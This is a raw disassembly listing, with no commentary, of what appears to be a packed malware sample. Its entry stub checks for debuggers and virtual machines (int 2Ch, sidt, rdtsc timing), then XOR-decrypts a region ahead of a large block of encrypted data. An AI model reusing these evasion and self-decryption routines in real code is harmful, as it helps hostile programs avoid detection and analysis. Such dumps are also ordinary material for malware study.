dd 90h, 0B8004000h, 0F04087B0h, 1082888Dh, 41891000h, 24548B01h
dd 0C528B04h, 83E902C6h, 0CA2B05C2h, 33FC4A89h, 0B0B8C3C0h
dd 64F04087h, 58Fh, 0C4830000h, 51535504h, 8D565257h, 104398h
dd 18538B10h, 406AE88Bh, 100068h, 473FF00h, 4B8B006Ah
dd 8BCA0310h, 8BD0FF01h, 338B50F8h, 318538Bh, 0C4B8BF2h
dd 858DCA03h, 1000111Dh, 8F0473FFh, 50006A00h, 0D1FF5657h
dd 8430358h, 538BF88Bh, 8BF08B18h, 0C083FC46h, 89F02B04h
dd 4B8B0856h, 244E8910h, 51144B8Bh, 0FF284E89h, 218589D7h
dd 8B100011h, 4B0359F0h, 80006818h, 6A0000h, 8B11FF57h
dd 5F5A5EC6h, 0FF5D5B59h, 95BE0h, 3F2h dup(0)
db 2 dup(0)
word_40A89A dw 0 ; DATA XREF: .text:00406750�o
; .text:00406794�o ...
dd 39DDh dup(0)
assume ds:_text
; =============== S U B R O U T I N E =======================================
public start
start proc near
cld
call sub_41903E
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419016 proc near ; CODE XREF: sub_41903E+4F�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_41901E: ; CODE XREF: sub_419016+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_41901E
pop ebx
retn
sub_419016 endp
; ---------------------------------------------------------------------------
db 0E6h, 0Dh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41903E
loc_41902F: ; CODE XREF: sub_41903E+3A�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41903E
; =============== S U B R O U T I N E =======================================
sub_419031 proc near ; CODE XREF: sub_41903E+8�j
; sub_41903E+19�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_419065
sub_419031 endp
; =============== S U B R O U T I N E =======================================
sub_41903B proc near ; CODE XREF: sub_41903E+1C�p
; sub_41903E+22�p
rdtsc
retn
sub_41903B endp
; =============== S U B R O U T I N E =======================================
sub_41903E proc near ; CODE XREF: start+1�p
var_6 = byte ptr -6
; FUNCTION CHUNK AT 0041902F SIZE 00000002 BYTES
test eax, eax
jnz short loc_41904A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short sub_419031
jmp short loc_419059
; ---------------------------------------------------------------------------
loc_41904A: ; CODE XREF: sub_41903E+2�j
push eax
sidt fword ptr [esp+4+var_6]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short sub_419031
loc_419059: ; CODE XREF: sub_41903E+A�j
push ebp
call sub_41903B
xchg eax, ecx
call sub_41903B
loc_419065: ; CODE XREF: sub_419031+8�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 16738h
sub eax, 100h
jnb short loc_41902F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_419016
or eax, 0FDAF780Dh
or [esi+5], esp
int 3 ; Trap to Debugger
add eax, 68A62524h
hlt
sub_41903E endp
; ---------------------------------------------------------------------------
sub esi, 0FFFFFFA9h
retf
; ---------------------------------------------------------------------------
db 2 dup(43h), 0D1h
dd 2E9CB6A7h, 85D3215Ah, 0D59CCA14h, 2A62861Eh, 0E7E79ECDh
dd 7A632B5Bh, 7E28EFC2h, 15090165h, 87342233h, 5D913B8h
dd 64DBC1C0h, 3393163Fh, 2976AD03h, 26F31942h, 1FBA0AB8h
dd 88DC89F9h, 3DBF81Dh, 83ABAFE9h, 9FB1BD91h, 0B0C4A294h
dd 20A9C4B7h, 4E4847EAh, 8BB97928h, 0AF8B48A1h, 0D1399495h
dd 0F21AE9ECh, 0E5070A38h, 2C563105h, 0F6C3B29Ah, 670E7388h
dd 5B3240A5h, 204A0341h, 22525146h, 52624C47h, 0FDFD4F1Dh
dd 353B9598h, 33020434h, 80DDF7F3h, 1154E52Bh, 0BD3B2121h
dd 0CA6D472Ch, 1529C6F7h, 0CA403FB4h, 1817AEAFh, 0B1B8B7DBh
dd 0D9D91597h, 9970BA9Eh, 98E4DBFCh, 0D6587243h, 6731E3A1h
dd 0E0415A6Bh, 6D1F97FAh, 0E29DCF43h, 761C0622h, 0D0ADA7E2h
dd 9C042E34h, 24FEFA37h, 93B30606h, 37CAC844h, 0E1A7EDEDh
dd 7A39E08Bh, 0E38AF8C8h, 0C5EE7FC6h, 0DE933143h, 3A1FB081h
dd 0B3BAB197h, 2FD9F72h, 9B4299BFh, 0A2F37F81h, 425A4459h
dd 0F3417781h, 6B425C89h, 352217DAh, 3BE94705h, 4F1E2839h
dd 10F3A9A4h, 7B6E2011h, 48FA1475h, 647BF708h, 8CE1CBD7h
dd 0BA50E12Fh, 66C8E2E0h, 0F5BC635Ah, 363BCAFBh, 0CDACAB06h
dd 0C17533B3h, 388C96B7h, 9991670Eh, 62D17D8Fh, 0B1840161h
dd 8D368AFCh, 0F409AA58h, 5D5EF1CAh, 0EA93A153h, 457BCFBBh
dd 1E3C7DC5h, 3C142D47h, 0D09DDD23h, 0A7FC263Ch, 0D7752ACEh
dd 91B79F2h, 9541F0F1h, 9BCB8EE5h, 67BEDCD9h, 0DAB2CCA5h
dd 2E333FC1h, 469A849Eh, 6C0AA769h, 0C1829C9Fh, 9F1EC091h
dd 0F96A8085h, 8BB6B979h, 2B53063Ah, 6E466109h, 82AFAB55h
dd 3F2E7862h, 4B233C37h, 14F7A5CEh, 36E22415h, 0CFFE1819h
dd 19F20EA6h, 0EEBCFF95h, 0FED298F9h, 0C5E78C72h, 2A4E32DBh
dd 0F1B6704Ch, 0DEA7C1F3h, 0C5993833h, 0B98941ABh, 0F9CD9D9Fh
dd 0A13BDDD7h, 0B9761078h, 3CD2794Bh, 7D637AD1h, 0CCCAA850h
dd 650B792Eh, 0B1BC44FAh, 4D233FFBh, 6DBE8CB0h, 3A0B2517h
dd 28FD409Fh, 6676860Eh, 0F1E7312Dh, 8755F584h, 0F6FDCCD1h
dd 0C1F8665Dh, 214ACFE0h, 55A6C3C4h, 0C69DB582h, 96002E27h
dd 0DE7A9F90h, 24FC1C95h, 176DB7A3h, 0BA4AFDC1h, 7EAA9070h
dd 69CE6C64h, 0ED3D575Ah, 6A1DCAC9h, 4F55C040h, 6994B6BBh
dd 8B8C2718h, 2A313091h, 1DF5F0EFh, 1115840Ch, 8957F6F6h
dd 0F8FFC56Fh, 9D3CC43Dh, 7A325ED3h, 55ABF5EDh, 0F8B42307h
dd 0BC6C52AEh, 6B00AEA2h, 4C7B9597h, 986F886Ch, 0A09CC0F3h
dd 4FDC7142h, 0ADBD650Ch, 0EB3B29A5h, 1C594EAFh, 3A70B841h
dd 0C9035F36h, 81ABE9Fh, 2C1FA41Eh, 1B7A1112h, 0ED14FB48h
dd 8B759E07h, 0FAD1A6E8h, 45A3DFE0h, 49BD9459h, 0B00123FAh
dd 415A5917h, 0D695C564h, 0B289C3F0h, 0A6175B13h, 9A1B4F07h
dd 8E657FE8h, 0D319197Ch, 26430D3Ah, 46C8CEA3h, 0DD6D4F60h
dd 6410380h, 0CD1D3758h, 0B11141F8h, 440175ECh, 73FB7914h
dd 4085076Dh, 62E0FA9Ah, 3B9BCEEh, 7D521EB2h, 0BBBBE5FAh
dd 0D7504C93h, 0CCA2803Ah, 0C0223CB2h, 0D8B95B6h, 0A87F918Fh
dd 39806205h, 80676C03h, 1D67546h, 787F7D6Ch, 0F9CEBDA1h
dd 60074800h, 15BEBA14h, 0A01F0916h, 3C132D38h, 5B684E6Eh
dd 51AB6563h, 7A867F60h, 5C879B99h, 9BA08391h, 0D99E3A5h
dd 0D6960E4Dh, 73442CCh, 9EA58FEBh, 0A8B9D9E0h, 23185857h
dd 2F81ABB0h, 0A100D050h, 0C46BE912h, 0EC89FC2Eh, 6BB9396Dh
dd 3D455F60h, 5C1731h, 247D203Dh, 26484D55h, 3E704855h
dd 0EF9CDC72h, 0AEFD2733h, 4EA75DCFh, 0F3B3A8AEh, 30FB8867h
dd 0E40E67E6h, 252B278Dh, 0B6B2FCE5h, 2FA4AAC2h, 0F4B6B123h
dd 0B9A611AAh, 87159C9Eh, 847A1973h, 195D3D2h, 886E542Bh
dd 0D9D19A5Dh, 70764C8Fh, 9B6D0056h, 68021DDFh, 38E2B93Eh
dd 0BE95766Eh, 0CBE45622h, 4DF63C6Eh, 0E5D8660Dh, 3DCA4D95h
dd 751976F3h, 24753Bh, 0DAC0DADFh, 0ED575F06h, 0FD4547FAh
dd 0EDE9B687h, 0A9706B2Ah, 0F9D49E9Fh, 0F129C4C3h, 93D5D7h
dd 89505186h, 90DAEEAh, 553C9D6Ch, 88B9D95Fh, 0B1307A67h
dd 0B2DBC353h, 8C8DCD60h, 0DE0C160Ch, 1C49B83h, 4BF40E0Eh
dd 242597FDh, 9624F5C5h, 0F7FEC324h, 14383234h, 0DFB6D02Eh
dd 0E0F0C4C5h, 96CFE970h, 0BB93C4FCh, 6B0DA0A5h, 0AF10C4C4h
dd 543C4C02h, 0DF14192Bh, 80B69871h, 0E6C79B9Ah, 670E4D15h
dd 0B631D1Fh, 64F7D5BEh, 87993405h, 0C885EB09h, 2B5A4445h
dd 1EF63045h, 11EA14A6h, 5DDF7F6h, 0F9D0EAEBh, 0EDC4DEDFh
dd 1EEB8482h, 0E5871F52h, 65F911BBh, 46E16E2Bh, 0ED4B4C41h
dd 0C00FF7D5h, 0FC1DEBC5h, 0E706311Bh, 0F22C1116h, 1629353Bh
dd 1B290C2Fh, 31343B3Bh, 325A3630h, 291C4256h, 55625E58h
dd 6E04707Ah, 54997761h, 7F854063h, 44DFB89Ch, 8FB3899Fh
dd 83AFA684h, 93DB99B0h, 0B0C0A1B9h, 0B9E1BCFCh, 0DAE2D1D4h
dd 0D0E5D6F5h, 0E60DEBFCh, 0FE00CF8Dh, 0DD03F4E0h, 0F7351910h
dd 5263C0Ch, 6B263D38h, 3E532212h, 3B7E2131h, 237F5D4Bh
dd 5E606F2Dh, 7B635440h, 4A967B7Ah, 269E646Dh, 688FA8C9h
dd 92BC9D9Fh, 898DE297h, 8DE8A2BEh, 0BDD1AFB9h, 0B9C1F9BFh
dd 0A4F4DBF5h, 0C7F8D2E6h, 0DDF5F8F2h, 9D35FDEAh, 0D71CE7C4h
dd 0D6391A1Eh, 79351002h, 2B303B18h, 355D3E3Ah, 55492B2Eh
dd 4545F7Ch, 51614A40h, 5D616446h, 499D5872h, 50F04B6Fh
dd 64AE8998h, 9ABA8595h, 97A485ADh, 0E7FFBDB5h, 88C6A98Ah
dd 0AAD2B3B8h, 0B1F3F0D8h, 0D8FACBCCh, 0ABC3E5EFh, 0CB02F5D6h
dd 0D51AE9E0h, 0C93B1410h, 3A37010Ch, 1B232761h, 13573101h
dd 3F5A2919h, 2E653C7Ch, 4D736645h, 5D654D56h, 529B5F19h
dd 6A80695Ah, 488B9096h, 46D8B38Bh, 9A9D9182h, 8CD2ACB7h
dd 0B2D5A386h, 0A5C6ACB1h, 84F5DADEh, 0CDEAEEABh, 0C9EDF4C8h
dd 0E504E6FCh, 0F60EF7EEh, 0F02D160Fh, 123F2A6Fh, 302B0001h
dd 654393Bh, 3840054Bh, 2F4A715Bh, 38655041h, 54462566h
dd 4D964F6Bh, 5D954279h, 0E826D68h, 6CBF84BBh, 93A18EAEh
dd 9AB1BA91h, 9FD2A1B9h, 0B7D98CC4h, 0A9EFE7D6h, 0C9E2CECFh
dd 0C1F7CFA0h, 0D10AF6F7h, 0FF2BB5BBh, 8A15080Eh, 1D3A1D20h
dd 413A1001h, 1E58196Ah, 3F634B38h, 27635B21h, 11195658h
dd 5F4B534Dh, 5E407E70h, 7F9C7D64h, 638C7776h, 618FF6B7h
dd 94A6AF9Eh, 85AC8DBBh, 92D2A5BCh, 0A0CE96C6h, 0ADF3D0FCh
dd 0D9FEC4FAh, 0D5EBF2A2h, 0F17BE5F3h, 0E80EE4E4h, 0FB061428h
dd 0E911173Dh, 224B000Ah, 1D4B2B33h, 3072212Fh, 50442E2Eh
dd 30724761h, 54666F4Fh, 584D1D7Bh, 6A9D7553h, 60BB7176h
dd 6AB78E91h, 89B48C89h, 8BAEB0B4h, 96F7D3BAh, 0B7C8B58Bh
dd 0A3E7DEC8h, 0F095CADCh, 0D7FBE0D0h, 0F618E3F9h, 0FF12E4FEh
dd 0C0650CF3h, 0E72B3000h, 26281309h, 0F22342Eh, 26703C23h
dd 115D0D44h, 327C524Ah, 59747849h, 406A7654h, 6C8D5D14h
dd 7DBB7766h, 6EAF8D9Fh, 88B088BDh, 0F0A98E8Bh, 94F4A198h
dd 0B1E9A7AFh, 82A3D8D2h, 0A5E7FEC6h, 0DBF9F5C8h, 0DB0CFCF9h
dd 0F918E2DAh, 0E42981ECh, 0EA3E0539h, 0C2C0C39h, 6C2D3237h
dd 1267251Ch, 374E3129h, 3A766F4Eh, 5072585Ah, 5F6A446Fh
dd 6DFB6C64h, 739A587Dh, 73B1858Eh, 93B09B83h, 9DAF8DADh
dd 92DCBAAAh, 0DADFA4A5h, 0BCF2CB8Eh, 94FCC7DDh, 0C3F9D5C1h
dd 0CFCCF7FDh, 0E707E0FDh
dd 0FE1DD184h, 0E534192Dh, 29340F03h, 2C2D14h, 23560733h
dd 5443426h, 24484948h, 6D422F57h, 537D7065h, 5588636Ah
dd 779D680Bh, 63979B8Dh, 74B29A91h, 9AA587E6h, 9CDDBDB4h
dd 0A8D7ABCEh, 0A4D5AFAAh, 0A5F4CDD4h, 0CA8ECDC7h, 0ACF4FFFBh
dd 0C418F5E1h, 0F705F786h, 882A1D11h, 19260227h, 4230E10h
dd 17553815h, 364F002Fh, 4C47505Ah, 25625E7Bh, 406F4A54h
dd 648A7D5Dh, 7F9C6262h, 69837463h, 75B887A0h, 9B85E682h
dd 87B2BFAFh, 0ADFBBAAAh, 0D1E9ACA6h, 0A0E8D8FEh, 0CDF5C4D9h
dd 0C3E1EED0h, 0E014E0C6h, 0E102CF87h, 0EC0E081Eh, 1C313C1Bh
dd 1D212407h, 217D5632h, 10600B1Dh, 90A0C0Ch, 13187E7Fh
dd 594F4142h, 62656974h, 4EF4776Ah, 7FA76567h, 66909B90h
dd 0B6B6AD90h, 8CA78EDDh, 0ADD3A580h, 0BFCB92BCh, 0BFDBDDCCh
dd 0DEC0ACECh, 0DBE3F3C6h, 0D616F5C3h, 0D616CDECh, 8E8BFF7Dh
dd 1707B85Ah, 9B4A6465h, 641A14D4h, 5E584C27h, 25751010h
dd 13D6BF30h, 635EFCA2h, 79535C77h, 8363EF42h, 92EA3428h
dd 9022FB33h, 0F9E0C64Eh, 2ECC1A5Ch, 483D5F84h, 0E6ACF6D2h
dd 0C9CAEA44h, 286BA0C5h, 0B1B88EEAh, 21735612h, 99708A1Bh
dd 0ED30162Fh, 55D37273h, 0B9C7660Dh, 69281A31h, 37345E4Fh
dd 51421041h, 457C625Fh, 6810402Bh, 0B8FB4E4Ch, 20C83E9Eh
dd 86135F59h, 7EFD234h, 0A7A61368h, 0FA466D6Ah, 0EF59D4E5h
dd 0C7AE5D44h, 1AA1BC8Dh, 6D69E3E6h, 9FF7212Eh, 28F398A9h
dd 9B7297B5h, 7099D469h, 12DFFF8Ah, 0FA4E5845h, 6B59D9D2h
dd 0A075B851h, 0D6A1BBBAh, 472E14B8h, 209EA3A0h, 1DEE2021h
dd 0A905EBEAh, 25C28D8Dh, 7D217EFBh, 645B63E4h, 19C8E2F8h
dd 1A4329CAh, 1AEF0D40h, 0CDA456EAh, 40C5B2B3h, 8596204Ah
dd 2449A99Bh, 0AD546E0Ah, 0C03CD383h, 0D40D2626h, 5551FF94h
dd 69C35E6Fh, 0ACADAD77h, 82C766Ch, 1C203EF9h, 3D142EC7h
dd 0DC897F23h, 24CC0CA2h, 827DF560h, 0BD3E77Dh, 0DF1BA2A1h
dd 0F3E0E4C1h, 81B21C5Ah, 0C174490Ah, 0EF6BC0F1h, 0D9523172h
dd 0B7AAA899h, 68DF9CB7h, 9E1C91FBh, 0E095B77Ah, 24B877Dh
dd 13A218ADh, 6F46606Ah, 606184DEh, 0E2A37419h, 4B1226D9h
dd 3E1A8ABAh, 0B9812425h, 26FE1911h, 0D2D9F40Fh, 0FE2E749Fh
dd 4AC9355h, 1E3E07A0h, 0E6785A19h, 8E674698h, 85F70D48h
dd 97CAF5DDh, 2C7056C1h, 0ADB3B102h, 2A7B5510h, 0A5478C12h
dd 0A88527Bh, 7A946A85h, 71AF6109h, 0A63802DEh, 75D8DC22h
dd 0C9263D0Fh, 8124393Bh, 0BC119565h, 18D3EE8Eh, 9611FA0Eh
dd 0F04D6043h, 0C13B813Dh, 0F6CD0FBDh, 6B9CDBDCh, 0EEAEB93Dh
dd 293448C4h, 459D8794h, 0BA998FD0h, 0AE3C1BAFh, 4EF89394h
dd 966D8580h, 8B651328h, 0EBAA6F70h, 72794F4Dh, 0E2B0ABD3h
dd 5A304F68h, 4E4F6F40h, 421937DCh, 625F7128h, 0BFFE4C1Ch
dd 1DC52335h, 8764CA30h, 4DCF7F2h, 0FAA5B8BBh, 84C2B78Fh
dd 0A0B7D1D2h, 253E3A94h, 5E9F8991h, 0E7E75B2Bh, 0B4EFF5F2h
dd 0F37B9597h, 0B84B3D75h, 73637D7Ch, 0B07BA8E7h, 0B4CE3C66h
dd 7CDC4F2Eh, 36E7C61Eh, 7761342h, 318ECA60h, 610F1906h
dd 0FC76DD9Bh, 0D262EE44h, 9FEB352Eh, 518CBCAFh, 7789AF86h
dd 0EEC4DB77h, 228A78D4h, 25F4D7A2h, 9AF1EB17h, 0EEC5FFE0h
dd 4B1C5CF6h, 277DA7B3h, 9A738348h, 0AA118080h, 4BCC8C7Ch
dd 254D5744h, 4688CEA3h, 9C684F60h, 6CA94340h, 1C4232h
dd 2F6DA6A7h, 37E61F10h, 31F98699h, 0C5EE0737h, 8C3205ACh
dd 35BE22Eh, 0FFC7E1E2h, 0E4BB2552h, 0E29149CAh, 4CE5ADCBh
dd 4498B18Ch, 0B48BA547h, 0DD5FA71Ah, 0A2F2CB7Fh, 0D729C8D2h
dd 4BD05703h, 374E2FACh, 6129375h, 33610052h, 78EAD0B9h
dd 7346390Ah, 839622EFh, 0D9072122h, 23FB15A7h, 44BF3788h
dd 8FEDAAB5h, 0FED5EF55h, 5EC12567h, 62B2DAE4h, 0DAB1CB55h
dd 3DD09FFCh, 0CDA38F18h, 0B68D2B2Dh, 8A8C369Ch, 0A355AFB0h
dd 0E60CE4A5h, 0BAF1080Dh, 0FB2D1E4Ch, 665A01Eh, 134C2720h
dd 262E39C9h, 3F0E1406h, 0C152E958h, 88382C24h, 25FD3008h
dd 0E7A3E9FCh, 3CC8976Bh, 5017C2F2h, 1C9AB4B6h, 0E8BED8D3h
dd 0B2C5A38Ah, 0B4C7AFAEh, 150F4BB6h, 3D8E9886h, 9FB4E85Eh
dd 5BF3195Bh, 0C56AB4AAh, 885D7812h, 2A033DEAh, 0A5D39F32h
dd 0E93A647Ah, 683538DFh, 85116C3Eh, 12466166h, 0A1F57577h
dd 27CE341Bh, 0E5D6088Ah, 3DCDCD95h, 811A0BF3h, 0C5D9896Ah
dd 2A39DBDBh, 0D9909244h, 0D1A8C22Bh, 281DEBB7h, 0B9A0B7D6h
dd 9DC72314h, 14F392A3h, 955CB6CCh, 4EB8178h, 7D645E28h
dd 0F4C3C790h, 650C6614h, 690FDFC0h, 0C8273E0Fh, 41280204h
dd 0BD6424AEh, 0D6001A08h, 2CD8679Ah, 5321E902h, 6AAD90B1h
dd 0A7928D8Ah, 82B1A5B5h, 92DAB1B2h, 0A1C5A9A0h, 15ADB8C0h
dd 4DC06326h, 4E05F278h, 0A03AFE96h, 0FD3CDF70h, 30D7F165h
dd 0C656406Ch, 734A6472h, 99735CD4h, 3DCDB3B2h, 222CDEAh
dd 431A3435h, 7083834Fh, 0CF30B719h, 0FC5D76BDh, 227F89FFh
dd 51DDC7C7h, 682EC81h, 0DDE8474Ah, 0C5CC59D3h, 0CD6845CFh
dd 4CAF7A3Eh, 0BD94AF0Ah, 91E0A2C9h, 0F37C9696h, 0C8F81E1h
dd 8D5452DEh, 0A542CF8h, 0E8C57629h, 69706A6Ch, 6D0FC3C6h
dd 0B2A94273h, 4AE3C637h, 397A797Ah, 98FB1875h, 20C82220h
dd 3FA993F9h, 0F88FF9C9h, 0CBE2DF58h, 22531FE1h, 0BBBAE4FEh
dd 0D83D084Ch, 0CBA3E839h, 8417D6B1h, 0BFFEFEE8h, 0CAEB67CAh
dd 7272BCA1h, 8F6681C0h, 8392CAF8h, 0C0416869h, 1FCF4213h
dd 5B5E4F60h, 42A4444h, 6B3FADC6h, 6C442C1Dh, 4EFB5DEh
dd 61711425h, 9E2D0B34h, 0DAE283ABh, 76F49C64h, 0C545FAA9h
dd 0E61187E4h, 0D8C84B08h, 0BFC1EDDAh, 337AB7C7h, 9C214DFEh
dd 0DB0BBE97h, 6E77D7ABh, 9E74D008h, 861272C0h, 0FB64E1B8h
dd 23CFAD5Ch, 5E8DDB5Bh, 0DE2C7677h, 7E95010Dh, 4F141E1Fh
dd 6BD09A0h, 1FFC2627h, 27C031BFh, 7A60F2FDh, 0CC290F0Eh
dd 0B07F6D25h, 6EBEE8E9h, 0EB828B40h, 0A5F690C1h, 0C2F0E4B6h
dd 0B78EA8C1h, 2E7DCB1Dh, 9F4685E9h, 0B89B117Ah, 0AA17849h
dd 7B627915h, 60B998E2h, 9CC56FD1h, 64ABC1B6h, 21220C0Dh
dd 69165A31h, 529FDB75h, 0ADFE2835h, 29C24B89h, 0F053EFFh
dd 1B2A2A3h, 0D9F67018h, 6C36D9EBh, 0DD83FD84h, 0D1CD1548h
dd 95A94AE5h, 89BC1C54h, 387C9DAFh, 0A147BDCAh, 0A558000Ch
dd 8DD6794Bh, 0B0C6924Bh, 0FA475148h, 0D0B06904h, 591F7900h
dd 793969B4h, 0D43CCFB8h, 353B1510h, 18B89490h, 305E0D3Eh
dd 0F405AAC3h, 1FAE7179h, 0A79CE7D8h, 0BB908B8Fh, 0F2B45A2Fh
dd 2DF9C3F4h, 0F6B67A2Dh, 0C9B468ACh, 0CBBFB59Ah, 0CE1BF2FAh
dd 0D657E3EDh, 0E604130Fh, 50675C1Ch, 5E250F00h, 353D6675h
dd 1F651815h, 3B66630Dh, 2C7C4146h, 5862645Ch, 466E6968h
dd 41816A43h, 669B6650h, 77B9959Fh, 99A7BAB6h, 0ADA7B8ACh
dd 93D2B2B1h, 0B5FB99B5h, 0ADF2D8C8h, 0CFE1C8DAh, 0C2EEE7FEh
dd 0C81AE2F3h, 0F400D9E6h, 0D01A1E17h, 0EE360521h, 10390402h
dd 0E502B0Ah, 562127h, 38533403h, 3E724759h, 484E4D4Fh
dd 4F6A716Eh, 709E6573h, 5EB7766Bh, 6AA8B91h, 0AE97A4BFh
dd 0AB979EB7h, 81D09E88h, 0B9DEA8BAh, 9DFDCFDAh, 0D1F1C1D9h
dd 0F1D5D0D3h, 0C30FE5EDh, 0FF27FFE2h, 0E10C0CF2h, 0FA1C2F1Ah
dd 4220B18h, 3E412939h
dd 3B523D31h, 21460B30h, 461F374Ch, 7E427B2Ch, 5C750130h
dd 4C906B7Bh, 7F996929h, 788C9488h, 92BAC38Fh, 0BEC78E84h
dd 0C4F0969Fh, 0A8CAA1ABh, 0BAD9C8CBh, 85C4E4B8h, 0FEFE85F4h
dd 8831D0D5h, 0EE1AFBA8h, 9A54F4F6h, 845B9D23h, 0F912696Ah
dd 5C63BBB3h, 0FB29752h, 542B7553h, 6432ACC5h, 0D4D22D1Eh
dd 5A56553Dh, 0C24E9E08h, 4FEF3922h, 7FCCC050h, 0C05489DAh
dd 0D1BCFE1Bh, 0CA4C6A55h, 0AC3ACBFCh, 0A800E8C2h, 0CC1C3E11h
dd 398D9783h, 9AAAAF19h, 0D8FC7590h, 6C270F7Eh, 645CC683h
dd 85E4E6A3h, 6456F4Ch, 62395250h, 6FB8B81Eh, 0A3210B10h
dd 3E152FB9h, 27A0A6A9h, 4FAD1728h, 0E7FF610Bh, 3CC8B76Bh
dd 24AB72F2h, 85BFE0EEh, 0E8BED032h, 9FF49FCEh, 9CEA84ECh
dd 0D90F4BB6h, 0B38E9886h, 0C696E85Eh, 0C89EC090h, 6B957B7Fh
dd 0B875A1EFh, 892E96Eh, 98969F60h, 643A545Dh, 76D0E19h
dd 80C6F71h, 0BF167C7Eh, 42639B3h, 0DEBFF01Ah, 0AF7FF3F2h
dd 0DD62CFFh, 1D8F79Bh, 6033B0E7h, 0E9F0F6FAh, 0DDB4C327h
dd 83EC9EC3h, 97D9E0FEh, 0EDD5F6F8h, 52D29EDCh, 91537B06h
dd 956B6E87h, 0C13C7A7Bh, 2E003D20h, 0E4B73463h, 650C7DBEh
dd 8618378h, 27753D55h, 41185A32h, 0CA5A6627h, 192BEB8Eh
dd 0E30C8D0Fh, 82B82176h, 33F70A60h, 6C4365E9h, 81C2ECFAh
dd 0C5DE82D1h, 82AAC4C5h, 0B20B47E9h, 44929C81h, 9FAD6D34h
dd 0A3717C95h, 0C43B8889h, 0B9512E38h, 331A345Fh, 32DF9B65h
dd 8F3E6875h, 5B324C47h, 3D563336h, 256E5A5Ch, 0C85E2868h
dd 1B29C588h, 0FB739911h, 1EEA342Fh, 57507AC6h, 70D0DAF2h
dd 0DDE8295Ah, 744783D3h, 0D59CEA86h, 0C9A4D228h, 819AEAFh
dd 0B1B8BBFCh, 78C11BCEh, 7170BAA7h, 729B8C83h, 25DDB515h
dd 754C5647h, 0CFE5D90Bh, 5D347E6Fh, 714CD7CEh, 114C3607h
dd 397A2B41h, 2D06764Dh, 0B5079213h, 13DC2AE7h, 7285397Ch
dd 6C5F61CFh, 0BDC6D0C1h, 5637D2BFh, 0D79EE86Dh, 9BF2EAE9h
dd 2A69E2E0h, 0B3BA8840h, 7AEB67C1h, 5D72BCA1h, 0BF487E04h
dd 0EDB27475h, 88B1979Bh, 5B5021D0h, 13B39751h, 52A7450h
dd 0AF2D676Dh, 0C4EDDE74h, 3A4AA5E6h, 76AC1425h, 5F063C57h
dd 0CE1E0409h, 0CDC1A26Ah, 0AEB0B4E3h, 17873EE3h, 5C773534h
dd 0CD94ABF3h, 95EED7E5h, 30016F94h, 0A9B0AAD4h, 0CC25DFDEh
dd 0C039D3D3h, 0A969E388h, 0ECAF6A5Bh, 6D747272h, 1427BA92h
dd 5520AE33h, 1733A3Bh, 6D557963h, 7D4C0C6Ah, 0B103165Bh
dd 17C0264Bh, 0BE3F115h, 0AC9EA3F1h, 929C9080h, 0A6DBADB5h
dd 4E4D9CCDh, 0CF96EB18h, 3C2F3926h, 0DF8E9885h, 0AB829C55h
dd 6076FAC7h, 0A3469D10h, 55CBF579h, 0F6525C72h, 5F6BA7DCh
dd 34680255h, 7CCBDDB6h, 8FA13C0Dh, 0D083BD3Dh, 630A143Ah
dd 70FF724Eh, 19F0645Eh, 0DE1A7FFFh, 0FE22EF1Bh, 0C7766618h
dd 0E9BFE9CEh, 55DBC6BBh, 2EA7C1D0h, 0F5B7DC22h, 0B98341ABh
dd 0FED49D9Fh, 923CD2DCh, 0D92FABB5h, 1CA07937h, 7D63412Eh
dd 714009F0h, 0D0B65557h, 591F51FDh, 0E09EB066h, 0A917011Fh
dd 0CAF4D4ABh, 28FF15F3h, 55BA5A0Eh, 5AA24F48h, 4E96B0DAh
dd 0B75818E8h, 6FC1EBF0h, 0EB31C010h, 41A9C3C6h, 0C69DB2D0h
dd 4E2426ACh, 0F785AFB8h, 8EB02E19h, 0C38587B8h, 99E848Dh
dd 4E79A2CDh, 0F6466364h, 663D5548h, 5BA1A7CDh, 26713F40h
dd 42193235h, 1AA0B2D7h, 0EE801B2Ch, 1DF50E80h, 7A3D8853h
dd 9123A4F6h, 0F8FFC527h, 999A1D5Bh, 0F33FB9DFh, 4154C5C6h
dd 0C8AF95D3h, 1104F45h, 0B0B78104h, 2952E096h, 0A84F230Fh
dd 199C2D7Eh, 80675DCBh, 0F044A5E3h, 683F58D3h, 0D73F0DC5h
dd 0DF17BE42h, 743B93B3h, 0C68AEF2Ah, 2D032D30h, 1E9D1178h
dd 8714076Fh, 6EED43Dh, 0F52E136Fh, 0EEC4BF64h, 773440D4h
dd 0D69DE76Ah, 99F3ABD6h, 92203A4Fh, 720CA394h, 0A73D1297h
dd 27FC8B8Ch, 8E555F44h, 0F3B17BC5h, 1EB2989Eh, 6A415BC8h
dd 0D7D3640Eh, 0AD7D6770h, 763106ADh, 0E8ACA62Ch, 9F052F00h
dd 0D7ABFB15h, 8160F8F8h, 8D0DA45h, 0E8BBED84h, 0A2C7E1E2h
dd 252E2A85h, 55AFF9E6h, 41B799FAh, 0F0A7FE27h, 284F5A6h
dd 8C3B1290h, 94934C9Ah, 8266CB80h, 0CE49773Ch, 5C0B6269h
dd 63A2DD56h, 313FB193h, 440F014Dh, 0C54F0BC5h, 0C3FD293h
dd 301BC922h, 0DDE1516h, 38CF713Fh, 30C2D2DCh, 0D0F0CAD5h
dd 8AEC9BDCh, 0ECCEF2F8h, 94F88486h, 31F2BFE0h, 0F2B25621h
dd 1A4926A8h, 0C0819B9Ch, 0CD22DF90h, 0BEA8167Bh, 0BD67748h
dd 7A617E5Eh, 75A65F0Ah, 33349A3Fh, 562D42A0h, 2E041D3Ch
dd 0C1422F3Ah, 222C6B1h, 29399418h, 70FAE05Bh, 0CE4FEF6h
dd 200F4C7Fh, 0A79DE4D6h, 0C47F4D25h, 1C37CCFEh, 652B94BCh
dd 0C4AA9849h, 0ADBC0D29h, 21829CAEh, 90586E1Fh, 0FEA4AF86h
dd 0DB08297Ah, 50EFF991h, 88C56052h, 0F5152A56h, 0EDA3B6C1h
